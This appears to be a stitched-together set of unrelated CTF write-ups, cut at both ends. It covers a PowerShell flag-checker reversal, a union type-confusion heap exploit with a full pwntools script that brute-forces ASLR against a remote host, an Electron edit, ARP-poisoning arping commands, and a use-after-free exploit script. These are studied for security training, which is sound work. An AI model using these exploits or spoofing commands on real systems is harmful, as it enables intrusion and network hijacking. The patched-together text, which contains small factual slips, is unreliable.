function w`FKh(${S`TR}) { Set-Variable -Name SBvn -Value (( VaRIAbLe ('nU'+'0') ).vAlUE::("{0}{1}"-f'Creat','e').Invoke(("{2}{0}{1}" -f'a25','6','sh'))) Set-Variable -Name gchekrns -Value (${Sb`Vn}."COM`pUTeh`ASH"( ( ls VaRIAblE:Po52ew ).Value::"uT`F8".("{0}{1}" -f 'GetB','ytes').Invoke(${S`Tr}))) Set-Variable -Name ANVI -Value ($CLOB::("{2}{1}{0}" -f'g','Strin','To').Invoke(${g`C`he`KrNs})) return ${an`VI}.("{1}{0}{2}" -f 'c','Repla','e').Invoke('-', '') }
function yu`FAs(${Bs`Nz}, ${w`cin}) { Set-Variable -Name uRcnB -Value (&("{0}{1}{2}"-f 'Ge','t','-Item') ${B`SnZ}) foreach(${_} in ${UR`cNB}.("{0}{1}{2}"-f 'G','etSubkeyName','s').Invoke()){ Set-Variable -Name NaMe -Value (${U`RCnB}."NA`mE" + "\" + ${_}) Set-Variable -Name GcHEKRNS -Value (.("{1}{0}" -f'fkh','w') ${NA`Me}) if(${w`CIN} -eq ${g`chEk`RNS}){ return &("{1}{0}" -f'h','wfk') ${_} } } return ("{0}{1}"-f 'N','OPE!') }
function v1(${In}) { Set-Variable -Name keY -Value (&("{0}{1}" -f 'yu','fas') ((("{4}{2}{1}{3}{0}" -f 's','TWA','M:dQUSOF','REdQUClasse','HKL'))."Rep`lA`cE"('dQU',[stRInG][cHar]92)) ("{4}{12}{5}{2}{3}{7}{9}{15}{10}{6}{11}{0}{14}{8}{19}{17}{1}{18}{16}{13}"-f'EE9D','92C','CAF12F','68','E','ECC8','DE5','B064E','166AA','AC31','F531','B00A2','8','C0','F2','4','F5','1','F29B6','5724')) Set-Variable -Name Key -Value (( variablE ("O"+"MZ")).vAlue::"tO`BAs`e6`4sTRINg"( ( gEt-cHIldItEM ("varIa"+"bl"+"E:P"+"O52E"+"W") ).VaLue::"uT`F8".("{0}{1}" -f'G','etBytes').Invoke(${k`Ey}))) Set-Variable -Name CODE -Value (@(-7, -39, -16, 18, -12, 0, 7, -34, -5, -62, -38, -11, 1, -3, -17, -53, -18, -19, 46, 58)) Set-Variable -Name iN -Value (( geT-cHilDIteM VariablE:oMZ).vaLuE::"TOba`SE`6`4StR`ing"( (VAriablePO52eW -vAl )::"uT`F8".("{0}{1}{2}"-f'G','etB','ytes').Invoke(${I`N}))) Set-Variable -Name iN -Value (${i`N}[0 .. ${i`N}."LE`NGTh"]) foreach(${I} in (0 .. (${i`N}."l`EN`gTH" - 1))){ ${In}[${I}] = [char]([Int]([char]${iN}[${I}]) + ${CO`dE}[${i}]) if (${in}[${i}] -ne ${k`ey}[${i}]){ return ${FA`L`se} } } return ${Tr`Ue} }
function v`2(${I`N}) { Set-Variable -Name keY -Value (.("{1}{0}"-f 'ufas','y') ((("{3}{2}{4}{0}{5}{1}"-f 'SOFTWARE','TKClasses','T','HKLM:P','K','P')) -crePLAce([ChAr]80+[ChAr]84+[ChAr]75),[ChAr]92) ("{5}{3}{16}{10}{17}{7}{19}{1}{9}{12}{2}{13}{8}{0}{6}{14}{11}{15}{18}{4}" -f '4','9','B','F0B','1','7D','111','F','2','A','953BAF801F','F','C','A485','6','6CBD36CE','C456','DF5703C0','1','DB2A73A1759')) Set-Variable -Name Key -Value ((GEt-varIABle ('O'+'mz') -VAluEo )::"TO`BaSe6`4`sTRing"( $Po52eW::"ut`F8".("{1}{2}{0}" -f 's','G','etByte').Invoke(${K`Ey}))) Set-Variable -Name COde -Value (@(-6, 20, -35, -17, -7, -1, -21, -49, 6, 1, -8, -33, -18, -3, -23, -56, -11, 3, 5, 7)) Set-Variable -Name iN -Value ((VaRiAbLE OMz -Va)::"TO`B`AsE6`4stRING"( ( varIablE ('Po'+'5'+'2eW') -VALU)::"u`Tf8".("{0}{1}{2}" -f'Ge','tBy','tes').Invoke(${In}))) Set-Variable -Name In -Value (${iN}[0 .. ${In}."leN`g`Th"]) foreach(${i} in (0 .. (${I`N}."lenG`Th" - 1))){ ${in}[${i}] = [char]([System.Int32]([char]${I`N}[${I}]) + ${cO`DE}[${i}]) if (${in}[${i}] -ne ${K`Ey}[${i}]){ return ${f`ALSE} } } return ${Tr`Ue} }
function V`3(${I`N}) { Set-Variable -Name kEY -Value (&("{0}{1}"-f'yufa','s') ((("{3}{4}{1}{5}{2}{0}"-f 'EvldClasses',':vldSO','AR','HKL','M','FTW')) -cREpLacE'vld',[CHAr]92) ("{10}{15}{4}{7}{16}{3}{6}{8}{0}{14}{2}{5}{13}{1}{12}{11}{9}{17}"-f'4BAAB1','B','7024','144D8','BB','A','1A9','AA97ECB3DE22A3','3B','4','8E0F76163','1F','7','E','6B21','2547D','41','2')) Set-Variable -Name key -Value ((varIaBlE oMz -vAluE )::"tObA`se64`STrI`NG"( $Po52ew::"ut`F8".("{2}{0}{1}"-f 'Byt','es','Get').Invoke(${k`eY}))) Set-Variable -Name cODe -Value (@(-20, 35, -5, 0, -11, -20, 29, -52, -17, 52, 9, 3, 4, -15, -13, 35, -24, -33, 28, 61)) Set-Variable -Name IN -Value ((gET-item VARIaBlE:OmZ ).valUe::"TOba`sE6`4s`TR`Ing"( (Get-VaRIaBlE Po52ew ).VAluE::"uT`F8".("{0}{1}{2}" -f'G','etB','ytes').Invoke(${IN}))) Set-Variable -Name in -Value (${i`N}[0 .. ${iN}."len`Gth"]) foreach(${I} in (0 .. (${IN}."Leng`Th" - 1))){ ${I`N}[${i}] = [char]([System.Int32]([char]${I`N}[${i}]) + ${c`oDe}[${I}]) if (${i`N}[${i}] -ne ${k`Ey}[${i}]){ return ${F`ALsE} } } return ${TR`UE} }
Set-Variable -Name INPUT -Value (.("{0}{2}{1}" -f'Read','st','-Ho') ("{4}{5}{0}{2}{3}{8}{1}{6}{7}"-f 't','eiv','h','e flag ','P','lease enter ','e y','our flag','to rec'))
if (${i`N`PUT}."l`eNGTh" -eq 39) { ${pA`RT1} = $2l36d::"J`oIN"("", ${i`NPUT}[ 0..12]) ${p`Art2} = ( GeT-vaRiaBLE ("2l3"+"6d") -valUeoNlY )::"j`OiN"("", ${in`P`Ut}[13..25]) ${PA`Rt3} = ( Gci ('VA'+'riA'+'blE:'+'2l36D') ).vaLue::"jO`IN"("", ${INp`Ut}[26..39]) if ((.('v1') ${P`Ar`T1}) -and (&('v2') ${p`ART2}) -and (.('v3') ${P`ARt3})) { .("{2}{1}{0}"-f '-Host','te','Wri') ((("{5}{9}{7}{6}{4}{2}{0}{8}{1}{3}"-f' why e','en ask',' flag, so','?','got the','Y',' clearly already ','e','v','ouo9tv')) -cReplaCE 'o9t',[cHAr]39) } else { &("{1}{3}{2}{0}" -f 'st','Write-','o','H') ("{1}{4}{2}{0}{3}" -f'y','No',' for ','ou.',' flag') } } else { &("{0}{2}{1}"-f'Writ','t','e-Hos') ("{2}{0}{1}{3}{4}"-f'a','g for yo','No fl','u','.') } ```
Here we can see lots of code mangled using mix of upper and lower cases, some strings shuffling runtime type resolving and dynamic invokation. I didn't want to got deep and demangle all of this code so I decide to run it part by part.
1. At the near end we can see:
```powershell Set-Variable -Name INPUT -Value (.("{0}{2}{1}" -f'Read','st','-Ho') ("{4}{5}{0}{2}{3}{8}{1}{6}{7}"-f 't','eiv','h','e flag ','P','lease enter ','e y','our flag','to rec')) ```
Running pieces like this:
```powershell ("{4}{5}{0}{2}{3}{8}{1}{6}{7}"-f 't','eiv','h','e flag ','P','lease enter ','e y','our flag','to rec') ```
Yields the corresponging string (we can do this for all of the code):
```powershell Set-Variable -Name INPUT -Value (.("Read-Host") ("Please enter the flag to receive your flag")) ```
We clearly see that that is a flag prompt.
1. Following same technique we can uderstand the flow better:
```powershell if (${i`N`PUT}."l`eNGTh" -eq 39) { ${pA`RT1} = $2l36d::"J`oIN"("", ${i`NPUT}[ 0..12]) ${p`Art2} = ( GeT-vaRiaBLE ("2l3"+"6d") -valUeoNlY )::"j`OiN"("", ${in`P`Ut}[13..25]) ${PA`Rt3} = ( Gci ('VA'+'riA'+'blE:'+'2l36D') ).vaLue::"jO`IN"("", ${INp`Ut}[26..39]) if ((.('v1') ${P`Ar`T1}) -and (&('v2') ${p`ART2}) -and (.('v3') ${P`ARt3})) { ... } ```
Here it basically checks if the lenght of the input is equal to `39`, if so, it splits the input into 3 variables: `part1` from `[0..12]`, `part2` from `[26..39]` and `part3` from `[26..39]`. And validaes each part by calling `v1`, `v2` and `v3` functions and passing the corresponding parts as a parameters.
1. Let's try to better understand what each function is doing:
Here is `v1`:
```powershell function v1(${In}) { Set-Variable -Name keY -Value (&("{0}{1}" -f 'yu','fas') ((("{4}{2}{1}{3}{0}" -f 's','TWA','M:dQUSOF','REdQUClasse','HKL'))."Rep`lA`cE"('dQU',[stRInG][cHar]92)) ("{4}{12}{5}{2}{3}{7}{9}{15}{10}{6}{11}{0}{14}{8}{19}{17}{1}{18}{16}{13}"-f'EE9D','92C','CAF12F','68','E','ECC8','DE5','B064E','166AA','AC31','F531','B00A2','8','C0','F2','4','F5','1','F29B6','5724')) Set-Variable -Name Key -Value (( variablE ("O"+"MZ")).vAlue::"tO`BAs`e6`4sTRINg"( ( gEt-cHIldItEM ("varIa"+"bl"+"E:P"+"O52E"+"W") ).VaLue::"uT`F8".("{0}{1}" -f'G','etBytes').Invoke(${k`Ey}))) Set-Variable -Name CODE -Value (@(-7, -39, -16, 18, -12, 0, 7, -34, -5, -62, -38, -11, 1, -3, -17, -53, -18, -19, 46, 58)) Set-Variable -Name iN -Value (( geT-cHilDIteM VariablE:oMZ).vaLuE::"TOba`SE`6`4StR`ing"( (VAriablePO52eW -vAl )::"uT`F8".("{0}{1}{2}"-f'G','etB','ytes').Invoke(${I`N}))) Set-Variable -Name iN -Value (${i`N}[0 .. ${i`N}."LE`NGTh"]) foreach(${I} in (0 .. (${i`N}."l`EN`gTH" - 1))){ ${In}[${I}] = [char]([Int]([char]${iN}[${I}]) + ${CO`dE}[${i}]) if (${in}[${i}] -ne ${k`ey}[${i}]){ return ${FA`L`se} } } return ${Tr`Ue} } ```
After some cleanup:
```powershell function v1(${in}) { Set-Variable -Name key -Value (&("yufas") ("HKLM:\SOFTWARE\Classes" ("E8ECC8CAF12F68B064EAC314F531DE5B00A2EE9DF2166AA5724192CF29B6F5C0"))) Set-Variable -Name key -Value (( Variable ("OMZ")).vAlue::"ToBase64String"(( Get-ChildItem ("varIablE:PO52EW")).VaLue::"UTF8".("GetBytes").Invoke(${key}))) Set-Variable -Name code -Value (@(-7, -39, -16, 18, -12, 0, 7, -34, -5, -62, -38, -11, 1, -3, -17, -53, -18, -19, 46, 58)) Set-Variable -Name in -Value (( Get-ChildItem Variable:oMZ).value::"ToBase64String"( (VariablePO52eW -val)::"UTF8".("GetBytes").Invoke(${in}))) Set-Variable -Name in -Value (${in}[0 .. ${in}."length"]) foreach(${i} in (0 .. (${in}."length" - 1))){ ${in}[${i}] = [char]([Int]([char]${in}[${I}]) + ${code}[${i}]) if (${in}[${i}] -ne ${key}[${i}]){ return ${False} } } return ${True} } ```
Here we can see, that if constructs some registry key, pass it to `yufas` function and stores the results as `key` variable.
Using globaly declared `OMZ` wich is a reference to `System.Convert` object it converts key into `base64` string.
`$code` variable is declered as array of constant ints.
Also function only parameter `$in` is also converted to `base64`.
After that we can see a for-loop that itterates over the `$in`, sums it with a corresponding element from `$code` and checks if the result is equal to element from `$key` if no functions immediatly returns `False`.
1. Running the parts of `v1` seperatly:
```powershell Set-Variable -Name key -Value (&("yufas") ("HKLM:\SOFTWARE\Classes" ("E8ECC8CAF12F68B064EAC314F531DE5B00A2EE9DF2166AA5724192CF29B6F5C0"))) Set-Variable -Name key -Value (( Variable ("OMZ")).vAlue::"ToBase64String"(( Get-ChildItem ("varIablE:PO52EW")).VaLue::"UTF8".("GetBytes").Invoke(${key}))) ```
It yields the `base64` that our input is compared against:
`M0FBMUU3M0NFNEREQTkwOTY1REE1QjczNTM2NzQ1RjhEQzQwMTdFRkFBREVCRjRDODhERTQ4NDk3MDdFNDExRA==`
We can now do the reverse, and subsctract `$code` from the `$key` to get the desired input:
```python #!/usr/bin/env/python3
import base64
def decode(key, code): user_in = [ord(k) - c for (k, c) in zip(key, code)] user_in = base64.b64decode(''.join([chr(x) for x in user_in])) return user_in
flag = []
# v1 key = "M0FBMUU3M0NFNEREQTkwOTY1REE1QjczNTM2NzQ1RjhEQzQwMTdFRkFBREVCRjRDODhERTQ4NDk3MDdFNDExRA==" code = [-7, -39, -16, 18, -12, 0, 7, -34, -5, -62, -38, -11, 1, -3, -17, -53, -18, -19, 46, 58] flag += decode(key, code)
# v2 key = "ODE5MDc5OTJERDQ4MzBDOTYyMDM3MDk4OTlGRDE4NTRFOThGQjYwQUZEMkVGQUE1OERGNzI1ODMyMDdBRTUzRA==" code = [-6, 20, -35, -17, -7, -1, -21, -49, 6, 1, -8, -33, -18, -3, -23, -56, -11, 3, 5, 7] flag += decode(key, code)
# v3 key = "Njg0ODg4QzBFQkIxN0YzNzQyOThCNjVFRTI4MDc1MjZDMDY2MDk0QzcwMUJDQzdFQkJFMUMxMDk1RjQ5NEZDMQ==" code = [-20, 35, -5, 0, -11, -20, 29, -52, -17, 52, 9, 3, 4, -15, -13, 35, -24, -33, 28, 61] flag += decode(key, code)
print(''.join([chr(x) for x in flag])) ```
The flag is `MetaCTF{P0w3rSHELL_!$_the_literal_B35T}` |
# Unionized
A union type confusion heap challenge at MetaCTF CyberGames 2021.
**Summary**: Use union confusion between char and string (pointer) to overwritefunction pointers on the heap. ASLR can be brute forced by writing lower 2 bytesand guessing just the top 4 bits.
## Challenge description
> Why didn't anyone tell me about the magic of Unionized when I first started> programming? I would have saved so much memory with these nifty things, don't> you think? Here try my application and tell me what you think> host.cg21.metaproblems.com:3150
### Files:
- [unionized_Release.tar.gz](unionized_Release.tar.gz): (includes challenge binary and source code)
## First steps
At first, this seems like a typical heap note challenge. We can add, edit, andremove objects.
```What would you like to do?1. Create new object2. Display objects3. Edit Object4. Delete Object5. Exit
```
However, they challenge title hints at an exploit involving union, so let's lookfor that. The user can create and edit objects. Objects are stored in a structin a linked list and have a pointer to a function for printing. There is a `win`function that pops a shell for us.
Here is the full struct:```cstruct created{ int type; int size;
union Variable { char * string; int integer; long long long_boi; char character; } variable;
void (*print)(); struct created *next;};```
## The vulnerability
The program lets us set the input an integer, long, char, or string. Thebehavior for reading in an int, long, and char are all very similar. Here is anexcerpt for reading in an int:
```cprintf("What is your value:\n");scanf("%d", &tmp->variable.integer);tmp->type = 2;tmp->print = display_int;```
Reading in a string is a bit different. First the program asks the user for thelength, then it `mallocs` a region of that size (but only if the size is largerthan the current size). Finally, it reads in data using `read`:
```cread(0, tmp->variable.string, tmp->size);tmp->type = 1;tmp->print = display_string;```
The vulnerability lies in not `malloc`ing a new chunk every time a string isread in. This means we can modify the address at `tmp->variable` and then writeto it by converting it back to a string.
## Exploit plan
The general plan is to create a string object, modify it to point to afunction pointer next to it on the heap, and then overwrite the pointer so thatit points to `win`.
We can do this by creating a string, changing its type to a character (to modifythe lowest byte to point to a function pointer in the struct), and then changeit back to a string and writing the address to `win`.
## Heap details
Here I've created two objects with strings, "AAAA" and "BBBB". Let's take a closerlook at what's being stored on the heap:
```(gdb) x/20gx 0x5555555592a00x5555555592a0: [0] 0x0000000400000001 [1] 0x00005555555592d00x5555555592b0: 0x0000555555555226 0x00005555555592f00x5555555592c0: 0x0000000000000000 0x00000000000000210x5555555592d0: [2] 0x0000000061616161 0x00000000000000000x5555555592e0: 0x0000000000000000 0x00000000000000310x5555555592f0: 0x0000000400000001 0x00005555555593200x555555559300: [3] 0x0000555555555226 0x00000000000000000x555555559310: 0x0000000000000000 0x00000000000000210x555555559320: 0x0000000062626262 0x00000000000000000x555555559330: 0x0000000000000000 0x0000000000020cd1```
The `created` struct starts at `[0]` and holds the type, size, Variable union,`print` function pointer, and a pointer to the next struct (they are stored in alinked list).
We can modify the string pointer at `[1]` (which currently points to the stringat `[2]`) to point to `[3]` (the `print` function of the next item). Here we cando that by changing the last byte to `00`. However, this is dependent on libcversions, so this may not work with the server's libc. Since heap chunks are8-byte aligned (on 64-bit systems), we can brute force all 256/8 = 32possibilities. Then we can overwrite the pointer to the `win` function. However,we have ASLR to deal with.
## Brute forcing ASLR
The `win` function differs from the `display_*` functions by several hundredbytes, so we need to overwrite the lower 2 bytes.
```(gdb) x/i win 0x555555555680 <win>: push rbp(gdb) x/i display_character 0x555555555299 <display_character>: push rbp(gdb) x/i display_int 0x555555555245 <display_int>: push rbp(gdb) x/i display_long 0x55555555526e <display_long>: push rbp(gdb) x/i display_string 0x555555555226 <display_string>: push rbp(gdb)```
Only the lowest 12 bits (3 hexadecimal digits) are preserved when the address isshuffled. That means if we overwrite the lower 2 bytes (or 16 bits), we don'tknow the 4 highest bits. Since 4 bits only has 16 possibilities, we can justbrute force this to bypass ASLR.
## Full exploit code
```python3#!/usr/bin/env python3
from pwn import *
exe = ELF("./chall")
context.binary = exe
gdbscript = """# b *create_variable+314 # string read# b *create_variable+454 # char scanf# b *create_variable+521 # long long scanfcontinue"""
def conn(): if args.LOCAL: r = process([exe.path]) elif args.GDB: return gdb.debug([exe.path], gdbscript=gdbscript) else: r = remote("host.cg21.metaproblems.com", 3150)
return r
def create_string(r, size, data): r.sendlineafter(b'Exit\n', b'1') # action: create r.sendlineafter(b'Character\n', b'1') # type: string r.sendlineafter(b'to be\n', str(size).encode()) # length r.sendlineafter(b'data\n', data) # data
def create_long(r, num): r.sendlineafter(b'Exit\n', b'1') # action: create r.sendlineafter(b'Character\n', b'3') # type: long long r.sendlineafter(b'value:\n', str(num).encode()) # data
def display_objects(r): r.sendlineafter(b'Exit\n', b'2') # action: display try: res = r.recvuntil(b'What', drop=True) return res.split(b'\n') except: return []
def edit_as_string(r, idx, size, data): r.sendlineafter(b'Exit\n', b'3') # action: create r.sendlineafter(b'modify?\n', str(idx).encode()) # modify index (starts at 0) r.sendlineafter(b'Character\n', b'1') # type: long long r.sendlineafter(b'to be\n', str(size).encode()) # length r.sendlineafter(b'data\n', data)
def edit_as_char(r, idx, char): r.sendlineafter(b'Exit\n', b'3') # action: create r.sendlineafter(b'modify?\n', str(idx).encode()) # modify index (starts at 0) r.sendlineafter(b'Character\n', b'4') # type: char r.sendlineafter(b'value:\n', bytes([char])) # send char as bytes
def brute_force_aslr(offset): while True: r = conn()
# we want to mimick the same conditions as brute_force_offset to preserve offsets create_long(r, 7) create_string(r, 1, b'A') create_long(r, 7)
# bottom 12 bits of win address is 0x680 # modifying lowest byte to be 0x80 edit_as_char(r, 1, offset+0x8) edit_as_string(r, 1, 1, b'\x80')
# modifying second lowest byte to be 0x06 # we have to guess the highest 4 bits (here we guess 0) edit_as_char(r, 1, offset+0x8+1) edit_as_string(r, 1, 1, b'\x06')
# display should call win if successful r.sendlineafter(b'Exit\n', b'2')
try: r.sendline(b'cat flag.txt') # this recvline will fail if the display errors res = r.recvline() if b'Segmentation fault' in res: raise Exception() print(res) r.interactive() break except: # keep on trying until we break ASLR print('failed') r.close()
def brute_force_offset(): for offset in range(0x0, 0x100, 0x8): if offset == 0x20: # ignore space because sscanf has issues with it continue print('Trying offset:', hex(offset))
r = conn()
# allocate two chunks on the heap so we can detect either one create_long(r, 7) create_string(r, 1, b'A') create_long(r, 7)
# overwrite the lowest byte of the heap pointer edit_as_char(r, 1, offset) edit_as_string(r, 1, 1, b'\x06')
vals = display_objects(r) print(vals) if len(vals) == 4 and (vals[0] == b'6' or vals[2] == b'6'): # if either of the chunks change their value to 6, then we have succeeded in finding an offset print('=' * 80) print('SUCCESS at offset:', hex(offset)) print('=' * 80)
r.close()
def main(): # note: first run brute_force_offset to get the offset, then run brute_force_aslr
# server offset: 0xe8, 0x68 # local offset: 0x28 # brute_force_offset()
brute_force_aslr(offset=0x68)
if __name__ == "__main__": main()``` |
Was able to obtain the flag by changing the source code, and running it with ```electron --inspect app.js```There's probably a way to do it without changing the source code, but I got a lot of error so I just changed the source code.```const options = { hostname: 'metaproblems.com', port: 443, path: '/858cdff94bcf63e59aafeebebb7bc304/' + xorStrings(decodeURIComponent(escape(Buffer.from('EksCGkoJVlMZBEwIFlMJX1YGWB5VDkcMGB1UXA==', 'base64').toString())),inspect_bool.substring(0,20) + 'lmth.xed') + '.html', // path: '/858cdff94bcf63e59aafeebebb7bc304/' + xorStrings(decodeURIComponent(escape(Buffer.from('EksCGkoJVlMZBEwIFlMJX1YGWB5VDkcMGB1UXA==', 'base64').toString())),inspect_bool.substring(0,20) + window.webContents.history[0].split("").reverse().join("").substring(0,8)) + '.html', method: 'GET' };```This is what I changed.
More details on : https://blog.drmoscovium.net/post/writeups/metactf/web-inspection/ |
Interception I - ARP poisoning: `arping -c 1 -U -s 192.168.0.2 192.168.0.1`
Interception II - `nmap` to discover which IP address has TCP port 8000 open, then ARP poison: `arping -c 1 -U -s 192.168.0.78 192.168.0.255`
Interception III - Login to one of the routers using weak credentials, then edit the link costs to reroute traffic through our router
[Read the full writeup here](https://ctf.zeyu2001.com/2021/metactf-cybergames/interception) |
# Arachnoid Heaven
The description for this challenge is as follows:
*In the steam world, you need some trustworthy companions to help you continue your journey. What's better than a handmade, top-tier, state of the art arachnoid machine?! Exactly, nothing! Come to Arachnoid Heaven and craft yours as soon as possible?*
The challenge was rated at 1 out of 4 stars, and it was worth 325 points at the end with a total of 151 solves. It was fairly easy, although it does require some basic knowledge of heap pwn concepts. The only downloadable was the challenge binary itself.
**TL;DR Solution:** Notice that the pointers to heap chunks within the global structure aren't deleted when memory is freed, giving us a use-after-free vulnerability. Use this fact to overwrite the name and code chunks of a now-deleted arachnoid and print the flag with the obtain_arachnoid function.
## Original Writeup Link
This writeup is also available on my GitHub! View it there via this link: https://github.com/knittingirl/CTF-Writeups/tree/main/pwn_challs/HTB_Uni_Quals_21/arachnoid_heaven
## Gathering Information
When I run the binary, I see that we have four main options in a menu: "Craft arachnoid", "Delete arachnoid", "View arachnoid", and "Obtain arachnoid". I can create arachnoids with specific indexes, names of my choosing, and code values that seem to default to "bad".```knittingirl@piglet:~/CTF/HTB_Uni_Quals_21$ ./arachnoid_heaven ?️ ?️ Welcome to Arachnoid Heaven! ?️ ?️
?????????????? ? ? ? 1. Craft arachnoid ? ? 2. Delete arachnoid ? ? 3. View arachnoid ? ? 4. Obtain arachnoid ? ? 5. Exit ? ? ? ??????????????
> 1
Name: zeroArachnoid Index: 0
?????????????? ? ? ? 1. Craft arachnoid ? ? 2. Delete arachnoid ? ? 3. View arachnoid ? ? 4. Obtain arachnoid ? ? 5. Exit ? ? ? ??????????????
> 3Arachnoid 0:Name: zero
Code: bad```When I decompile the code in Ghidra, the main function is straightforward in processing menu selections. The craft_arachnoid function allocates chunks of size 0x28 for the name and code; the name is filled with user input, and the code is filled with the contents of a global variable. Pointers to both chunks are placed in an array in global variables.``` input_name = (void **)malloc(0x10); allocated_code = malloc(0x28); *input_name = allocated_code; allocated_code = malloc(0x28); input_name[1] = allocated_code; printf("%s","\nName: "); read(0,*input_name,0x14); strcpy((char *)input_name[1],defaultCode); lVar1 = (long)(int)arachnoidCount; allocated_code = input_name[1]; arachnoids[lVar1 * 0x10] = *input_name; /* I have to overwrite this bit, possible by overwriting the defaultCode global */ arachnoids[lVar1 * 0x10 + 1] = allocated_code; printf("Arachnoid Index: %d\n\n",(ulong)arachnoidCount); arachnoidCount = arachnoidCount + 1;```I can also use the delete_arachnoid function to "delete" an arachnoid at an index of my choosing. Basically, this function will free the name and code chunks of that arachnoid, but it doesn't do anything about the pointers within the arachnoids global.``` printf("Index: "); read(0,index,2); uVar1 = atoi(index); lVar2 = (long)(int)uVar1; printf("Arachnoid %d:\n\nName: %s\nCode: %s\n",(ulong)uVar1,(void *)arachnoids[lVar2 * 0x10], arachnoids[lVar2 * 0x10 + 1]); if (((int)uVar1 < 0) || (arachnoidCount <= (int)uVar1)) { puts("Invalid Index!"); } else { free((void *)arachnoids[lVar2 * 0x10]); free((void *)arachnoids[lVar2 * 0x10 + 1]); }```view_arachnoid prints off the contents of the name and code chunk pointed to by each index in the global array up to the last allocated index. No special consideration is made for "deleted" arachnoids.``` i = 0; while ((int)i < arachnoidCount) {
printf("Arachnoid %d:\nName: %s\nCode: %s\n",(ulong)i,arachnoids[(long)(int)i * 0x10], arachnoids[(long)(int)i * 0x10 + 1]); i = i + 1; }```Finally, the obtain_arachnoid function sticks out as containing a win condition. Specifically, this occurs if we can get the first six characters of the code value to equal "sp1d3y", but we don't control this value during normal operations.``` puts("Arachnoid: "); read(0,my_index,2); numeric_index = atoi(my_index); if ((numeric_index < 0) || (arachnoidCount <= numeric_index)) { puts("Invalid Index!"); } else { numeric_index = strncmp((char *)arachnoids[(long)numeric_index * 0x10 + 1],"sp1d3y",6); if (numeric_index == 0) { system("cat flag.txt"); } else { puts("Unauthorised!"); } }```## A Heap Leak Rabbit-Hole
So, in modern implementations such as Ubuntu 20, freed chunks of memory are stored in tcache bins. Chunks that are the same or similar in size are stored in the same bin in a singly-linked list. When a chunk is freed, the first sixteen bytes of that chunk are overwritten with metadata; the first eight bytes is an address pointing to the next chunk in the list; the next eight bytes are a key value that points to the beginning of the tcache structure.
Practically, in this context, we can easily print the values of these pointers to the terminal. Since "View arachnoid" prints strings in chunks regardless of allocation status, if I free arachnoids and do not allocate the same number of new arachnoids, the name and code values will be printed as the address of the next chunk in the tcache list. Here is a snippet of what it looks like; the order of frees was index 2, 1, 0:``` Arachnoid 0:Name: p\xf3\xe94yUCode: \xc0\xf2\xe94yUArachnoid 1:Name: \xf0\xf3\xe94yUCode: @\xf3\xe94yUArachnoid 2:Name: Code: \xc0\xf3\xe94yU```Arachnoid 2's name is empty because it was the first chunk to get freed, so it is at the head of the list and does not point to anything else. If you have GDB GEF installed, you can also use "heap bins" to view the contents of your tcache bins and verify that their addresses seem to match up with the leaked next values.```gef➤ heap bins─────────────────────────── Tcachebins for thread 1 ───────────────────────────Tcachebins[idx=1, size=0x30] count=6 ← Chunk(addr=0x557934e9f2f0, size=0x30, flags=PREV_INUSE) ← Chunk(addr=0x557934e9f2c0, size=0x30, flags=PREV_INUSE) ← Chunk(addr=0x557934e9f370, size=0x30, flags=PREV_INUSE) ← Chunk(addr=0x557934e9f340, size=0x30, flags=PREV_INUSE) ← Chunk(addr=0x557934e9f3f0, size=0x30, flags=PREV_INUSE) ← Chunk(addr=0x557934e9f3c0, size=0x30, flags=PREV_INUSE)
```
Ultimately, these leaks were not helpful to solving the challenge, but I think that this is a great starting example of what you can potentially do with heap pwn.
## Writing the Exploit
A final piece of information makes solving this challenge very simple; at least with tcache, freed chunks are allocated on a last-in first-out basis. When you free an arachnoid, the last chunk to be freed is a code chunk. When you create one, the first chunk allocated is a name chunk. As a result, if you create an arachnoid after previously deleting one, the freed code chunk is overwritten with the name of your choosing, and since indexes to those freed chunks are never overwritten, you can effectively create arachnoid entries with a name of "bad" and a code value of your choosing. This lets us trigger the win condition on "Obtain arachnoid". Here is a simple pwntools script to implement this strategy, with a couple of extra views for illustrative purposes:```from pwn import *
#target = process('./arachnoid_heaven')
#pid = gdb.attach(target, "\nb *craft_arachnoid\nb *view_arachnoid\n set disassembly-flavor intel\ncontinue")
target = remote('64.227.38.214', 30311)
def craft_arachnoid(name): print(target.recvuntil(b'>')) target.sendline(b'1') print(target.recvuntil(b'Name:')) target.sendline(name)
def delete_arachnoid(index): print(target.recvuntil(b'>')) target.sendline(b'2') print(target.recvuntil(b'Index:')) target.sendline(index)def view_arachnoid(): print(target.recvuntil(b'>')) target.sendline(b'3')
def obtain_arachnoid(index): print(target.recvuntil(b'>')) target.sendline(b'4') print(target.recvuntil(b'Arachnoid:')) target.sendline(index) craft_arachnoid(b'hello')
delete_arachnoid(b'0')view_arachnoid()
craft_arachnoid(b'sp1d3y')
view_arachnoid()obtain_arachnoid(b'0')
target.interactive()```And here is what it looks like when you run the script:```knittingirl@piglet:~/CTF/HTB_Uni_Quals_21$ python3 arachnoid_writeup.py [+] Opening connection to 64.227.38.214 on port 30311: Doneb'\xf0\x9f\x95\xb8\xef\xb8\x8f \xf0\x9f\x95\xb7\xef\xb8\x8f \x1b[1;6;34mWelcome to Arachnoid Heaven!\x1b[0m \xf0\x9f\x95\xb7\xef\xb8\x8f \xf0\x9f\x95\xb8\xef\xb8\x8f\n\n \xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 1. Craft arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 2. Delete arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 3. View arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 4. Obtain arachnoid \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 5. Exit \xf0\x9f\x94\xa9\n \xf0\x9f\x94\xa9 \xf0\x9f\x94\xa9\n 